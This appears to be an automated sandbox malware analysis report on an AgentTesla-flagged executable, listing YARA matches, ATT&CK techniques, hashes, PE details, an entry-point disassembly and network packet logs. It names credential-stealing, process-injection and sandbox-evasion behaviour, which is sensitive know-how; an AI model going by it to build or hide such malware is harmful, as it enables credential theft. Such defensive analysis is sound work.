Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 0000000C.00000002.487587781.000000001DF31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6900, type: MEMORY

Source: Yara match	File source: 0000000C.00000002.487587781.000000001DF31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6900, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 0000000C.00000002.487587781.000000001DF31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6900, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	DLL Side-Loading1	Process Injection112	Virtualization/Sandbox Evasion34	Input Capture1	Security Software Discovery631	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Disable or Modify Tools1	LSASS Memory	Virtualization/Sandbox Evasion34	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection112	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery313	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PO112000891122110.exe	48%	Virustotal		Browse
PO112000891122110.exe	11%	ReversingLabs	Win32.Worm.Wbvb

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://byztWS.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
googlehosted.l.googleusercontent.com	142.250.186.33	true	false		high
doc-14-58-docs.googleusercontent.com	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	RegAsm.exe, 0000000C.00000002.487587781.000000001DF31000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	RegAsm.exe, 0000000C.00000002.487587781.000000001DF31000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	RegAsm.exe, 0000000C.00000002.487587781.000000001DF31000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://byztWS.com	RegAsm.exe, 0000000C.00000002.487587781.000000001DF31000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.186.33	unknown	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356643
Start date:	23.02.2021
Start time:	13:54:10
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PO112000891122110.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.troj.evad.winEXE@8/0@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 46.2% (good quality ratio 22.3%) Quality average: 32.9% Quality standard deviation: 37.7%
HCA Information:	Successful, ratio: 95% Number of executed functions: 100 Number of non-executed functions: 16
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 204.79.197.200, 13.107.21.200, 93.184.220.29, 51.104.144.132, 104.43.193.48, 13.64.90.137, 23.211.6.115, 168.61.161.212, 13.88.21.125, 23.218.208.56, 216.58.212.174, 51.103.5.159, 51.104.139.180, 93.184.221.240, 92.122.213.194, 92.122.213.247, 20.54.26.129 Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, vip1-par02p.wns.notify.trafficmanager.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, drive.google.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:55:50	API Interceptor	535x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
142.250.186.33	GUEROLA INDUSTRIES N#U00ba de cuenta.exe	Get hash	malicious	Browse
	xerox for hycite.htm	Get hash	malicious	Browse
	Muligheds.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
googlehosted.l.googleusercontent.com	GUEROLA INDUSTRIES N#U00ba de cuenta.exe	Get hash	malicious	Browse	142.250.186.33
	xerox for hycite.htm	Get hash	malicious	Browse	142.250.186.33
	Muligheds.exe	Get hash	malicious	Browse	142.250.186.33
	2021-Nouvelle masse salariale-Rapport.html	Get hash	malicious	Browse	216.58.209.33
	SOLICITUD DE HERJIMAR, SL (HJM-745022821).exe	Get hash	malicious	Browse	216.58.208.161
	#U6211#U662f#U56fe#U7247.exe	Get hash	malicious	Browse	216.58.208.161
	OneNote rmos@dataflex-int.com.html	Get hash	malicious	Browse	216.58.208.129
	Sponsor A Child, Best Online Donation Site, Top NGO - World Vision India.html	Get hash	malicious	Browse	172.217.20.225
	barcelona-v-psg-liv-uefa-2021.html	Get hash	malicious	Browse	172.217.20.225
	Barcelona-v-PSG-0tv.html	Get hash	malicious	Browse	172.217.20.225
	CONSTRUCCIONES SAN MART#U00cdN, S.A. SOLICITAR. (SMT-14517022021).exe	Get hash	malicious	Browse	172.217.20.225
	executable.908.exe	Get hash	malicious	Browse	216.58.208.161
	executable.908.exe	Get hash	malicious	Browse	216.58.208.161
	executable.908.exe	Get hash	malicious	Browse	216.58.208.161
	executable.908.exe	Get hash	malicious	Browse	216.58.208.161
	OEVGVSOGAH.dll	Get hash	malicious	Browse	216.58.206.65
	executable.908.exe	Get hash	malicious	Browse	216.58.206.65
	executable.908.exe	Get hash	malicious	Browse	216.58.206.65
	executable.908.exe	Get hash	malicious	Browse	216.58.206.65
	executable.908.exe	Get hash	malicious	Browse	216.58.206.65

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GOOGLEUS	firefox-3.0.0.zip	Get hash	malicious	Browse	35.244.181.201
	MT OCEAN STAR ISO 8217 2005.xlsx	Get hash	malicious	Browse	34.102.136.180
	fedex.apk	Get hash	malicious	Browse	142.250.186.138
	Malody-4.3.7.apk	Get hash	malicious	Browse	142.250.186.74
	Malody-4.3.7.apk	Get hash	malicious	Browse	142.250.186.42
	Quote_13940007.exe	Get hash	malicious	Browse	216.239.32.21
	0O9BJfVJi6fEMoS.exe	Get hash	malicious	Browse	34.102.136.180
	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Get hash	malicious	Browse	34.102.136.180
	dex.dex	Get hash	malicious	Browse	142.250.185.202
	dex.dex	Get hash	malicious	Browse	142.250.185.170
	SKBM 0222.exe	Get hash	malicious	Browse	216.239.32.21
	lpdKSOB78u.exe	Get hash	malicious	Browse	34.102.136.180
	vBugmobiJh.exe	Get hash	malicious	Browse	34.102.136.180
	ORDER SPECIFICATIONS.exe	Get hash	malicious	Browse	34.102.136.180
	crypted.exe	Get hash	malicious	Browse	216.239.32.21
	NewOrder.xlsm	Get hash	malicious	Browse	34.102.136.180
	Order_20180218001.exe	Get hash	malicious	Browse	34.102.136.180
	22 FEB -PROCESSING.xlsx	Get hash	malicious	Browse	34.102.136.180
	SOA.exe	Get hash	malicious	Browse	35.186.238.101
	ORDER LIST.xlsx	Get hash	malicious	Browse	34.102.136.180

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	OutplayedInstaller (1).exe	Get hash	malicious	Browse	142.250.186.33
	Facecheck - app-Installer (1).exe	Get hash	malicious	Browse	142.250.186.33
	Buff-Installer (9).exe	Get hash	malicious	Browse	142.250.186.33
	coltTicket#513473.htm	Get hash	malicious	Browse	142.250.186.33
	FortPlayerInstaller.exe	Get hash	malicious	Browse	142.250.186.33
	RGB HeroInstaller.exe	Get hash	malicious	Browse	142.250.186.33
	Buff-Installer.exe	Get hash	malicious	Browse	142.250.186.33
	unmapped_executable_of_polyglot_duke.dll	Get hash	malicious	Browse	142.250.186.33
	smartandfinalTicket#51347303511505986.htm	Get hash	malicious	Browse	142.250.186.33
	f4b1bde3-706a-40d2-8ace-693803810b6f.exe	Get hash	malicious	Browse	142.250.186.33
	LIQUIDACION INTERBANCARIA 02_22_2021.xls	Get hash	malicious	Browse	142.250.186.33
	document-550193913.xls	Get hash	malicious	Browse	142.250.186.33
	GUEROLA INDUSTRIES N#U00ba de cuenta.exe	Get hash	malicious	Browse	142.250.186.33
	receipt145.htm	Get hash	malicious	Browse	142.250.186.33
	xerox for hycite.htm	Get hash	malicious	Browse	142.250.186.33
	SecuriteInfo.com.Heur.15528.xls	Get hash	malicious	Browse	142.250.186.33
	Muligheds.exe	Get hash	malicious	Browse	142.250.186.33
	DHL_6368638172 documento de recibo,pdf.exe	Get hash	malicious	Browse	142.250.186.33
	PDF.exe	Get hash	malicious	Browse	142.250.186.33
	pagamento.exe	Get hash	malicious	Browse	142.250.186.33

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.436855505392075
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PO112000891122110.exe
File size:	73728
MD5:	fcc9d54e6b6142da1459a6af8ce507e6
SHA1:	9be22b91de41b513a1198c9a8b35cec7002b03f0
SHA256:	00e8e128207532461425994497ef690fe37b3e1a81df6b001127bfa8ae9036df
SHA512:	504129d03543eaf76e3cd59e7bfe9b8fcc49000e2dd53cdbac2bb0fbbcaa8814fb39597b7cce512956060e9dadf0ff3f8c8211ebc9ac0798b6d8d32274852f3c
SSDEEP:	1536:htDySjFlLM4FUwUbw+TSAQliwYempYID:httLTUwUbwsSAwiwqYI
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L....~\V.....................0....................@................

File Icon


Icon Hash:	1e74f2ea62e4a082

Static PE Info

General
Entrypoint:	0x401494
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x565C7E2E [Mon Nov 30 16:49:50 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b84199caadebcbcd5f63d7b7de7ff518

Entrypoint Preview

Instruction
push 0040A010h
call 00007FF4E4C62AC3h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
outsb
jmp far 4C00h : 08806E30h
test al, 76h
lahf
inc esi
ror dword ptr [ecx+000028C9h], 00000000h
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+6603038Fh], bl
jne 00007FF4E4C62B3Dh
jnc 00007FF4E4C62B37h
outsb
jnc 00007FF4E4C62AD2h
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
or dword ptr [edi], ebx
xchg eax, ebp
pop es
mov word ptr [ecx-4DBE8BE4h], ss
xor eax, 6367E273h
les ecx, fword ptr [esi]
pop edi
adc eax, 4CCA5E6Dh
xchg dword ptr [ebx+5Ah], ebx
xor al, D3h
pop edi
jne 00007FF4E4C62B0Ch
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or dword ptr [edx+090F0000h], 00000000h
add byte ptr [eax], al
or al, 00h
push edx
inc ebp
push ebx
inc ebp
dec esi
push esp
inc ebp
dec esi
inc ebx
dec ecx
dec esi
inc edi
add byte ptr [56000501h], cl
dec ecx
push esi
inc ecx
push esp
add byte ptr [ecx], bl
add dword ptr [eax], eax
inc edx

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xf124	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x12000	0xc24	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x150	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xe6c4	0xf000	False	0.395979817708	data	5.97563810687	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x10000	0x1218	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x12000	0xc24	0x1000	False	0.2666015625	data	2.92316343304	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1237c	0x8a8	data
RT_GROUP_ICON	0x12368	0x14	data
RT_VERSION	0x120f0	0x278	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaVarForInit, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaVarTstEq, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaErrorOverflow, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaLateMemCall, __vbaStrToAnsi, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, __vbaVarForNext, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0409 0x04b0
InternalName	Kvikslvbarometer
FileVersion	1.00
CompanyName	Log
ProductName	Log Inverter
ProductVersion	1.00
FileDescription	Log Inverter
OriginalFilename	Kvikslvbarometer.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 13:55:40.786583900 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:40.835100889 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:40.835263014 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:40.835804939 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:40.884705067 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:40.891868114 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:40.891900063 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:40.891917944 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:40.891935110 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:40.891966105 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:40.892013073 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:40.892019987 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:40.906912088 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:40.955820084 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:40.955981016 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:40.957568884 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.011040926 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.211857080 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.211885929 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.211904049 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.211920977 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.211935043 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.212021112 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.212069035 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.215161085 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.215186119 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.216804028 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.218641996 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.218667030 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.218724012 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.222017050 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.222039938 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.225486994 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.225511074 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.225549936 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.225572109 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.228878975 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.228904963 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.230169058 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.260488033 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.260514975 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.262010098 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.262156963 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.262178898 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.262250900 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.262273073 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.265535116 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.265561104 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.265634060 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.268960953 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.268986940 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.269144058 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.272420883 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.272448063 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.272563934 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.272603989 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.275863886 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.275897026 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.275983095 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.276026964 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.279277086 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.279304981 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.279422045 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.282690048 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.282718897 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.282804012 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.286025047 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.286050081 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.286137104 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.286159992 CET	49721	443	192.168.2.5	142.250.186.33
Feb 23, 2021 13:55:41.289155006 CET	443	49721	142.250.186.33	192.168.2.5
Feb 23, 2021 13:55:41.289180994 CET	443	49721	142.250.186.33	192.168.2.5
